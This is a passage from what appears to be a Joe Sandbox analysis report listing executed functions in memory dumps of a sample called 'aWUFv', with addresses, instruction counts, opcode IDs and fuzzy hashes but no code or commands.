                                                                        • Opcode ID: 4ad97bcfd27ce20c8d50684839584d9116cdf5150c6d60d39230fa9fae9579bd
                                                                        • Instruction ID: 1f09cdbddf0e1d78b1318e520cc77d7052f1cf1d2ea1fe612bc1024875916cbd
                                                                        • Opcode Fuzzy Hash: 4ad97bcfd27ce20c8d50684839584d9116cdf5150c6d60d39230fa9fae9579bd
                                                                        • Instruction Fuzzy Hash: 25E08C70E10118ABDF10DAB0CA06B5A77ACDB01214F2088A6D408CB201E273DA0287E0

                                                                        Executed Functions

                                                                        Function 00E51340 Relevance: .6, Instructions: 594COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 99c288acdd58ccf424eabc677a3924d79e1e814518776b62c2c8cc8e7a22c151
                                                                        • Instruction ID: 5af5bbb7c55071d1c719144cad6c7768c9b2a68a1db881d76681ff668bd7a7b3
                                                                        • Opcode Fuzzy Hash: 99c288acdd58ccf424eabc677a3924d79e1e814518776b62c2c8cc8e7a22c151
                                                                        • Instruction Fuzzy Hash: A4326D30B00201CFDB18EF74D89076A73A6BBCD346B108969D9569B399EB39EC46CF51
                                                                        Function 00E50BC0 Relevance: .3, Instructions: 339COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f5f936e7c9d93189592c16e8152a96a6ef59376527dd1dbafb4ac93d1e9ba31c
                                                                        • Instruction ID: 3c687e236954acf828b8f8cba17e07223913fc82b3c74cf95d16b8d8ff594229
                                                                        • Opcode Fuzzy Hash: f5f936e7c9d93189592c16e8152a96a6ef59376527dd1dbafb4ac93d1e9ba31c
                                                                        • Instruction Fuzzy Hash: AE81C535A00341CFDB15AFB4C81879EBBF2EF88301F158969E5126B3A5DB35AD85CB40
                                                                        Function 00E51230 Relevance: .1, Instructions: 91COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1dda07e778341dbde999e4f77e06653b0499877264098b470de05ec64ac66c05
                                                                        • Instruction ID: 4a33bfccd2bf792a99d9adba40bd37d8731cff7fc8a4baad3d018d1a7ad52aa8
                                                                        • Opcode Fuzzy Hash: 1dda07e778341dbde999e4f77e06653b0499877264098b470de05ec64ac66c05
                                                                        • Instruction Fuzzy Hash: 1C313C757016518FC719AB38C85891D3BE2AF8A71675108F8E502DF372DE35DC82CB41
                                                                        Function 00E51240 Relevance: .1, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0a2c2100c44a625dc1bddb28beac364a767d21c82ac51f651b1e5c17c5399ed0
                                                                        • Instruction ID: 13423cab05f815b32df17cc3c7a53312c1941cc78b408e42b95fe0a226c6ebf4
                                                                        • Opcode Fuzzy Hash: 0a2c2100c44a625dc1bddb28beac364a767d21c82ac51f651b1e5c17c5399ed0
                                                                        • Instruction Fuzzy Hash: 8821B575741611CFC759AB38C45891D77E6AF8AB1636108B8E906DF371DE36DC82CB80
                                                                        Function 00E51C00 Relevance: .0, Instructions: 49COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 26c7b1a0a9254f89422f8816c4419168d234e342e3d37a691f43bb76de55f09d
                                                                        • Instruction ID: 71625b8d8c6a1cfee19a99df0d603f819415a0a159b5da5f2c6bf07b0b628f35
                                                                        • Opcode Fuzzy Hash: 26c7b1a0a9254f89422f8816c4419168d234e342e3d37a691f43bb76de55f09d
                                                                        • Instruction Fuzzy Hash: F9118E76E042458FCB05EFB4D8409EEFBB5EF8D30071186AAE515EB222E7759905CF90
                                                                        Function 00E51C10 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 09b74cc9cc34c5fa1f45b19051a4fa1c9c8a64cc9c34c0a9fce51fa455c5c5d5
                                                                        • Instruction ID: 51acbb92224cd81c5881273515487aa805ed4e2f7485f3fc8311f5e2740e780f
                                                                        • Opcode Fuzzy Hash: 09b74cc9cc34c5fa1f45b19051a4fa1c9c8a64cc9c34c0a9fce51fa455c5c5d5
                                                                        • Instruction Fuzzy Hash: 03018C36E002059FCB00EFB4D8408ABFBF9FF8C200710866AE5199B221EB70A905CF90
                                                                        Function 00E50880 Relevance: .0, Instructions: 38COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4f917729c27f1cfcd0e2d9b1703bbe5b8bb36004a4d6a002e2247800aa2270f3
                                                                        • Instruction ID: 9ff380d0e22237fc7a8febc211cb2d709c15775f479fd10538e1621d7af5224d
                                                                        • Opcode Fuzzy Hash: 4f917729c27f1cfcd0e2d9b1703bbe5b8bb36004a4d6a002e2247800aa2270f3
                                                                        • Instruction Fuzzy Hash: 7801AD61D0E3D45FDB0797B858109EA7FB05E13321F1919EBD8D5E71A3D2204909C7A3
                                                                        Function 00E50F9D Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: be6076c1e51442c992f4f95facd62402d68cf24b5726e472fb504c7336817ddf
                                                                        • Instruction ID: a4d403faffef5f9fbfcf9fd4ad7ca44c673cb84712d0add0c2f52fa18fd9804b
                                                                        • Opcode Fuzzy Hash: be6076c1e51442c992f4f95facd62402d68cf24b5726e472fb504c7336817ddf
                                                                        • Instruction Fuzzy Hash: BBF03074A00315CFDB14EF74C5587AE7BF0BB48705F250C98D902A72A0CB748C88CB60
                                                                        Function 00E51AE0 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dc36891853b86e1f2c52f6de4df3525ca7efe4895967384630f73cc90e4a06a9
                                                                        • Instruction ID: 87e1ce9d6cdd8272ccf10007df9d4443a39b4d5bee8feb4993b40f6c47d2130e
                                                                        • Opcode Fuzzy Hash: dc36891853b86e1f2c52f6de4df3525ca7efe4895967384630f73cc90e4a06a9
                                                                        • Instruction Fuzzy Hash: 57D012357002149BC710EB75E949B453778AB09711F5141A5E904DB290EA61DC14C7D1
                                                                        Function 00E508A8 Relevance: .0, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000D.00000002.2626452013.0000000000E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E50000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_13_2_e50000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3df9e29460b47037222c7e346439882e47a1c18632adda383c2515ad95fe3e20
                                                                        • Instruction ID: d064d3e8cc4b58401369a75f10f9fb5f3fae8214a8115c33c119e813e7bee393
                                                                        • Opcode Fuzzy Hash: 3df9e29460b47037222c7e346439882e47a1c18632adda383c2515ad95fe3e20
                                                                        • Instruction Fuzzy Hash: 76D067B1D05219AF8B40EFB999096DEBBF8FE09251B114566D919E3200E6705A14CBD1

                                                                        Executed Functions

                                                                        Function 02801340 Relevance: 10.6, Strings: 8, Instructions: 578COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2706775804.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_2800000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D@$D@$D@$D@$D@$D@$D@$D@
                                                                        • API String ID: 0-3736683001
                                                                        • Opcode ID: 76f9278e2ec500f046b258b9dbce1c11e696e8599761a75572785a84d2654f19
                                                                        • Instruction ID: 1c7f2d021e540805ad706353bffe3a8d6d5f0d68a790f9833df3f6cc88c940c4
                                                                        • Opcode Fuzzy Hash: 76f9278e2ec500f046b258b9dbce1c11e696e8599761a75572785a84d2654f19
                                                                        • Instruction Fuzzy Hash: C7329C38B00705CFCB54EF70E89466A73A2BBC8395B148969C41ADB398DB39EC46CB41
                                                                        Function 02800BC0 Relevance: 1.6, Strings: 1, Instructions: 338COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2706775804.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_2800000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: D@
                                                                        • API String ID: 0-2222373746
                                                                        • Opcode ID: 12edb20bf4a1b982ec5c1f72c4fd196691e3827b49bfa9d9bdc0f20c2951db4e
                                                                        • Instruction ID: c2b8ba9be3ae8ac96dbb7b7f0a305938722c09c0bbc7aaa2f49650a71a000f0e
                                                                        • Opcode Fuzzy Hash: 12edb20bf4a1b982ec5c1f72c4fd196691e3827b49bfa9d9bdc0f20c2951db4e
                                                                        • Instruction Fuzzy Hash: 3381D239A00705CFDB159F71D8587AEBBB2EF88350F148569D406AB3A4DF75AC89CB80
                                                                        Function 02801240 Relevance: .1, Instructions: 81COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2706775804.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_2800000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 554e2fb50c5c4670c8372b1e75e5d960b866acfc6ecc7f5fe4b70d54aa9ea9bc
                                                                        • Instruction ID: 7fd7bf6dddd104e80ccb974845ce8ac239a48c82387a7469571bcf26762e5c5d
                                                                        • Opcode Fuzzy Hash: 554e2fb50c5c4670c8372b1e75e5d960b866acfc6ecc7f5fe4b70d54aa9ea9bc
                                                                        • Instruction Fuzzy Hash: 0721E775701611CFCB59AB38C89881D77E2AF8A71636108B8E506DF3B1DE36DC82CB80
                                                                        Function 02801C10 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2706775804.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_2800000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e11d3329a8c73c7267f5ffd2d6dce36119dd466f5d3638a1c95067a175c6a41e
                                                                        • Instruction ID: f67d942a16c70c3c34103d3ab3aea1a6d24df6da88012df5bc5fe3f8bc79d41f
                                                                        • Opcode Fuzzy Hash: e11d3329a8c73c7267f5ffd2d6dce36119dd466f5d3638a1c95067a175c6a41e
                                                                        • Instruction Fuzzy Hash: 49018036E002059FCB40EFA4D84489FFBF5FF8931071085AAE51997220EB70A911CB90
                                                                        Function 02800F9D Relevance: .0, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2706775804.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_2800000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: df8626b05f320293830e87b9b2b527872fdb309bbed8e6f85e849079a7a24841
                                                                        • Instruction ID: d1b199aad1d91343256e6671750afe68fcba1bf6883c65246bc61d964e986d62
                                                                        • Opcode Fuzzy Hash: df8626b05f320293830e87b9b2b527872fdb309bbed8e6f85e849079a7a24841
                                                                        • Instruction Fuzzy Hash: C2F01CB8A00305CFDB18EB64C89C7AE7BB0BB08714F140858D406EB2E0CBB58C84CB51
                                                                        Function 02801AE0 Relevance: .0, Instructions: 18COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2706775804.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_2800000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 41934c739781af7eb134519f80b4ea9096e0a53be1df9f37bf5c27a292743817
                                                                        • Instruction ID: 4a27056616245d0b89f5f9828afd33cb38cbc3c45a3da207b23b6cf40e5a00ee
                                                                        • Opcode Fuzzy Hash: 41934c739781af7eb134519f80b4ea9096e0a53be1df9f37bf5c27a292743817
                                                                        • Instruction Fuzzy Hash: D7D012397102149FC714EB79FD49A467778AB09651F504095E508DB291EB61D814C7D1
                                                                        Function 028008A8 Relevance: .0, Instructions: 17COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2706775804.0000000002800000.00000040.00000800.00020000.00000000.sdmp, Offset: 02800000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_2800000_aWUFv.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ccedf3d74abc22f664d8b2622e823332c5d17a584919d07135fbb53f122cc0e9
                                                                        • Instruction ID: 14cb799e55e5bea9e547e38219b84799102921b240d61a35051ab272ed0782e5
                                                                        • Opcode Fuzzy Hash: ccedf3d74abc22f664d8b2622e823332c5d17a584919d07135fbb53f122cc0e9
                                                                        • Instruction Fuzzy Hash: D4D067B5D0121DAF8B80EFB9AD091DEBBF8FE09250B104566D919E7240E6715A14CBD1